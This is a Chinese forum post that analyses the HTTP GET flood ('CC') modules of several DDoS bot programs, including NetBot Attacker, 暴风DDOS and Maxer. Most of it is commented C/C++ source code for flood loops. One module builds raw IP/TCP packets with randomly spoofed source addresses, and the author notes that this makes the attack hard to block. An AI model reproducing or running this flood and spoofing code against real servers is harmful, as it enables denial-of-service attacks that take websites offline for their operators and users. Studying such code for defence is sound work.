HanDs
管理员

[Visual Studio文章] 攻击模块分析-GET篇 



对现有的所能找到的DDOS代码(攻击模块)做出一次分析----GET篇
分析者:alalmn—飞龙       BLOG:http://hi.baidu.com/alalmn
分析的不好请各位高手见谅花了几个小时分析的呵呵

在这里不得不说 很多代码只写了界面 服务端没代码(把代码删除了) 要发就全部发了 重点自己藏着
这就是中国程序员的通病   一时半会没办法克服

实际中的HTTPGET攻击就是CC
CC(http get flood)的定义可以用下面几句话进行描述:
1.利用代理服务器向受害者发起大量HTTP Get请求
2.主要请求动态页面,涉及到数据库访问操作
3.数据库负载以及数据库连接池负载极高,无法响应正常请求,导致系统不可用。

//=================================================================================

NetBot_Attacker.h

/*
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求   不缓存,每回重新请求页面!
unsigned long CALLBACK null_get(LPVOID dParam)   //缓存 Get Flood   空GET链接
客户机 HTTP 空GET请求=nocache_get            NoCache Get Flood(缓存 Get Flood)=null_get
但是我不这样认为 从他函数的意思 来看正好相反(估计是NB在发布代码的时候做手脚的 NB老爱玩小动作)
真正的意思是   HTTP 空GET请求=null_get       NoCache Get Flood(缓存 Get Flood)=nocache_get


doHTTP 这个地方其实我觉得没必要这么麻烦
可以这样 send(m_hSocket,szBuffer,sizeof(szBuffer)    直接发送就好了(不知道效果一样不呵呵)
*/

bool doHTTP(char* ServerName,DWORD port,char* ActionFile, char* Method,char* HttpHeaders, char* FormData)
{ //doHTTP("127.0.0.1",8080,"*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html","GET","Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n","");
HMODULE hDll;
LPVOID hSession,hConnect,hRequest;
bool bSendRequest=false;
char buf[1000];
DWORD dwFlags;

hDll = LoadLibrary("wininet.dll");
if(hDll)
{
   typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
   typedef LPVOID ( WINAPI * pInternetConnect ) ( LPVOID ,LPCTSTR ,WORD ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
   typedef LPVOID ( WINAPI * pHttpOpenRequest ) ( LPVOID ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCTSTR ,LPCSTR FAR * ,DWORD ,DWORD);
   typedef BOOL ( WINAPI * pHttpSendRequest ) (LPVOID ,LPCSTR ,DWORD ,LPVOID,DWORD) ;
   typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
   typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );

   pInternetOpen InternetOpen=NULL;
   pInternetConnect InternetConnect=NULL;
   pHttpOpenRequest HttpOpenRequest=NULL;
   pHttpSendRequest HttpSendRequest=NULL;
   pInternetCloseHandle InternetCloseHandle=NULL;
   pInternetReadFile InternetReadFile=NULL;

   InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
   InternetConnect = (pInternetConnect ) GetProcAddress ( hDll, "InternetConnectA");
   HttpOpenRequest = (pHttpOpenRequest) GetProcAddress (hDll,"HttpOpenRequestA");
   HttpSendRequest = ( pHttpSendRequest ) GetProcAddress( hDll, "HttpSendRequestA" );
   InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
   InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

   // 创建Internet
   hSession = InternetOpen("Hackeroo",0, NULL, NULL, 0);
   if (hSession != NULL)
   {
    // 连接服务器
    hConnect = InternetConnect(hSession,ServerName,(WORD)port, NULL, NULL, 3, 0, 1);
    if (hConnect!= NULL)
    {
     // 创建一个请求
     LPTSTR AcceptTypes[2]={"*/*",NULL};
     hRequest = HttpOpenRequest(hConnect,Method,ActionFile,"HTTP/1.1",NULL,(LPCTSTR*)AcceptTypes,0, 1);
     if (hRequest!= NULL)
     {
      // 发送请求
      bSendRequest =HttpSendRequest(hRequest,HttpHeaders,strlen(HttpHeaders),FormData,strlen(FormData));
      if (bSendRequest)
      {
       memset(buf,0,1000);
       InternetReadFile(hRequest, buf,999, &dwFlags);
       printf("%s",buf);
      }
     }
    }
    // 清除句柄
    if (hRequest)
     InternetCloseHandle(hRequest);
    if (hConnect)
     InternetCloseHandle(hConnect);
    if (hSession)
     InternetCloseHandle(hSession);
   }
   FreeLibrary(hDll);
}
return bSendRequest;
}


/***************************************************/
unsigned long CALLBACK nocache_get(LPVOID dParam) //HTTP 空GET请求   不缓存,每回重新请求页面!
{
char all[100],ip[32],port[6],url[32],*point=NULL;
int httpport=80;
strcpy(all,fuckweb.FuckIP); //复制内存    //攻击网址
point=all;
/*
//其实我觉得这段根本没用   这些我觉得都应该在客户端里处理好了在发过来
if(strstr(all,"http://")!=NULL) //strstr查找字符串
{//没有
    point=point+strlen("http://");//把http://添加进point
}
if(strstr(point,":")!=NULL)//strstr查找字符串
{
   memset(ip,0,sizeof(ip));   //内存空间初始化
   strncpy(ip,point,strcspn(point,":"));   //复制内存
                 //strcspn查找字符出现的位置
   point=point+strcspn(point,":")+1; //把:添加进point
   if(strstr(point,"/")!=NULL) //strstr查找字符串
   {
    memset(port,0,sizeof(port));
    strncpy(port,point,strcspn(point,"/"));
    httpport=atoi(port);
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point); //复制内存
   }
}
else
{
   if(strstr(point,"/")!=NULL)
   {
    memset(ip,0,sizeof(ip));
    strncpy(ip,point,strcspn(point,"/"));
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
   }
}
*/
while(!stopfuck)
{
     doHTTP(ip,
         httpport,
         "/*(&*^TGH*JIHG^&*(&^%*(*)OK)(*&^%$EDRGF%&^.html",
         "GET",
         "Cache-Control: no-cache\r\nReferer: http://www.baidu.com\r\n",
         ""); //创建连接 发送请求
   Sleep(40);
}
return 0;
}

unsigned long CALLBACK null_get(LPVOID dParam)   //缓存 Get Flood   空GET链接
{
char all[100],ip[32],port[6],url[32],*point=NULL;
int httpport=80;
strcpy(all,fuckweb.FuckIP);
point=all;
if(strstr(all,"http://")!=NULL)
{
    point=point+strlen("http://");
}
if(strstr(point,":")!=NULL)
{
   memset(ip,0,sizeof(ip));
   strncpy(ip,point,strcspn(point,":"));
   point=point+strcspn(point,":")+1;
   if(strstr(point,"/")!=NULL)
   {
    memset(port,0,sizeof(port));
    strncpy(port,point,strcspn(point,"/"));
    httpport=atoi(port);
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
   }
}
else                                   //这些都一样
{
   if(strstr(point,"/")!=NULL)
   {
    memset(ip,0,sizeof(ip));
    strncpy(ip,point,strcspn(point,"/"));
    point=point+strcspn(point,"/");
    memset(url,0,sizeof(url));
    strcpy(url,point);
   }
}

while(!stopfuck)
{
     doHTTP(ip,
         httpport,
         "",
         "GET",
         "Cache-Control: no-cache\r\nReferer: http://www.google.com\r\n",
         "");
   Sleep(40);
}
return 0;
}

//=================================================================================

暴风DDOS.h

void moni_flood() //IE缓存
{
CString url11,http,rhost;
http = zIP;
    rhost = http;
char *jj = "/";

    url11="GET "+rsCS(jj)+" HTTP/1.1\r\n"     //要访问的页面(/list.asp?id=***)       
                +"Referer: http://"+rhost+":80/http://"+rhost
     +"\r\nHost: "+rhost    //访问来源地址
     +"\r\nConnection: Close"   //
     +"\r\nCache-Control: no-cache"
       +"\r\n\r\n";
   
    while (1)
{
   if (StopFlag == 1) //是否在攻击状态
   {
    ExitThread(0);
    return;
   }
     SOCKET S=tcpConnect(tgtIP,tgtPort);   //创建一个套接字连接到已经存在的服务器
   send(S,url11,url11.GetLength() ,0); //发送消息
   closesocket(S);   //关闭socket
   Sleep(SleepTime); //延时
}
}

//=================================================================================

Maxer.h

DWORD WINAPI HTTP(LPVOID dParam)   //HTTP缓存攻击
{
srand((unsigned)time( NULL ));

PDDOSINFO pddosinfo = (PDDOSINFO)dParam; //攻击结构体
DDOSINFO ddosinfo; //攻击结构体
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));//复制内存

WSADATA               WSAData;//这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据
WSAStartup(MAKEWORD(2,2) ,&WSAData);//确定SOCKET版本
    SOCKET             sendSocket;
    SOCKADDR_IN        Sin; //IP信息结构
    IP_HEADER          ipHeader;
    TCP_HEADER         tcpHeader;
    PSD_HEADER         psdHeader;
    char               szSendBuf[128]={0};

    if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) //创建一个与指定传送服务提供者捆绑的套接口
    {
        printf("Socket Setup Error...\n");
        return 0;
    }
BOOL               flag=1;
    if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时      //SOCKET_ERROR创建错误
    {
        printf("Setsockopt IP_HDRINCL Error...\n");
        return 0;
    }

    int timeout = 3000;
    if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR) //设置套接口的选项 设置发送和接收的超时      //SOCKET_ERROR创建错误
    {
        printf("Setsockopt SO_SNDTIMEO Error...\n");
        return 0;
    }

Sin.sin_family = AF_INET; //sin_family 地址家族(必须是AF_INET)
Sin.sin_port=htons(ddosinfo.port); //将网络地址转换成IP地址
Sin.sin_addr.S_un.S_addr=resolve(ddosinfo.addr); //存储端口号(使用网络字节顺序)

char         src_ip[20] = {0};

while(1)
    {
   if(IsStop==1)//是否在攻击状态
   {
    ExitThread(0);
    return 0;
   }


   if (rand()%2==0) //随机数   
    strcpy(szSendBuf,"GET / HTTP GET / HTTP GET / HTTP GET / HTTP GET / HTTP"); //GET 数据
   else
    strcpy(szSendBuf,"POST / HTTP POST / HTTP POST / HTTP POST / HTTP POST / HTTP"); //POST 数据
  
   for(int a=0;a<24;a++)
   {
    wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); //格式化字符串 伪造IP
    //这样写比较好每次产生的IP都不同    就可以更好让人家对我们攻击难以屏蔽
    
    //填充IP首部
    ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); //高四位IP版本号,低四位首部长度
    ipHeader.tos = 0;
    ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader));   //16位总长度(字节)
    ipHeader.ident = 1; //16位标识
    ipHeader.frag_and_flags = 0x40;   //3位标志位
    ipHeader.ttl = 128;   //8位生存时间TTL
    ipHeader.proto = IPPROTO_TCP;   //8位协议(TCP,UDP…)
    ipHeader.checksum = 0;   //16位IP首部校验和
    ipHeader.sourceIP = inet_addr(src_ip);   //伪IP 伪装自己的IP
    ipHeader.destIP = Sin.sin_addr.s_addr; //目标地址

    //填充TCP首部
    tcpHeader.th_sport = htons(rand()%1025); //源端口号 目标端口 随机产生呵呵很好很高很绝
    tcpHeader.th_dport = htons( ddosinfo.port ); //目标端口
    tcpHeader.th_seq = htonl( rand()%900000000 + 1 );   //SYN序列号
    tcpHeader.th_ack=rand()%3; //ACK序列号置为0
    if (rand()%2 == 0) tcpHeader.th_flag=0x02;   //SYN 标志    //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
    else tcpHeader.th_flag=0x10;   //SYN 标志    //0,2,4,8,16,32->FIN,SYN,RST,PSH,ACK,URG
    tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0);   //TCP长度和保留位
    tcpHeader.th_win = htons(512);   //窗口大小
    tcpHeader.th_sum = 0;   //校验
    tcpHeader.th_urp = 0;   //紧急数据偏移量

    //填充TCP伪首部(用于计算校验和,并不真正发送)
    psdHeader.saddr = ipHeader.sourceIP;    //伪IP 伪装自己的IP
    psdHeader.daddr = ipHeader.destIP;   //目标地址
    psdHeader.mbz = 0;
    psdHeader.ptcl = IPPROTO_TCP;   //协议类型
    psdHeader.tcpl = htons(sizeof(tcpHeader));    //TCP长度

    //计算TCP校验和
    memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
    memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
    tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );

    //计算IP检验和
    memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
    memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
    ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );

    sendto(sendSocket, szSendBuf,sizeof(szSendBuf) + sizeof(ipHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin));   //发送TCP报文
   }
   Sleep(40);
}
    return 0;
}


//IE攻击攻击
DWORD WINAPI IE(LPVOID dParam)
{
PDDOSINFO pddosinfo = (PDDOSINFO)dParam;
DDOSINFO ddosinfo;
memcpy(&ddosinfo,pddosinfo,sizeof(DDOSINFO));
HMODULE hDll;
LPVOID hInternet,hUrlHandle;
char buf[1000],*retstr=NULL;
retstr=buf;
DWORD dwFlags;

hDll = LoadLibrary("wininet.dll");
typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
typedef LPVOID ( WINAPI * pInternetOpenUrl ) ( LPVOID ,LPCTSTR ,LPCTSTR ,DWORD ,DWORD ,DWORD);
typedef BOOL ( WINAPI * pInternetCloseHandle ) ( LPVOID );
typedef BOOL ( WINAPI * pInternetReadFile ) (LPVOID ,LPVOID ,DWORD ,LPDWORD) ;
pInternetOpen InternetOpen=NULL;
pInternetOpenUrl InternetOpenUrl=NULL;
pInternetCloseHandle InternetCloseHandle=NULL;
pInternetReadFile InternetReadFile=NULL;
InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, "InternetOpenA" );
InternetOpenUrl = (pInternetOpenUrl ) GetProcAddress ( hDll, "InternetOpenUrlA");
InternetCloseHandle = (pInternetCloseHandle) GetProcAddress (hDll,"InternetCloseHandle");
InternetReadFile = (pInternetReadFile) GetProcAddress(hDll,"InternetReadFile");

while (1)
{
   if (IsStop == 1)
   {
    FreeLibrary(hDll);
    ExitThread(0);
    return 0;
   }
   // 创建Internet
   hInternet = InternetOpen("CreateIE",0, NULL, NULL, 0); //获取句柄   初始化应用程序
   if (hInternet != NULL)
   {
    hUrlHandle = InternetOpenUrl(hInternet, ddosinfo.addr, NULL, 0, 0x04000000, 0); //打开链接网站
    if (hUrlHandle!= NULL)
    {
     memset(buf,0,1000);
     InternetReadFile(hUrlHandle, buf,999, &dwFlags); //读取数据
     InternetCloseHandle(hUrlHandle);
     hUrlHandle = NULL;
    }
    InternetCloseHandle(hInternet);
    hInternet = NULL;
   }
   Sleep(50000);
}
}


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
攻击 模块 分析 - GE T
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复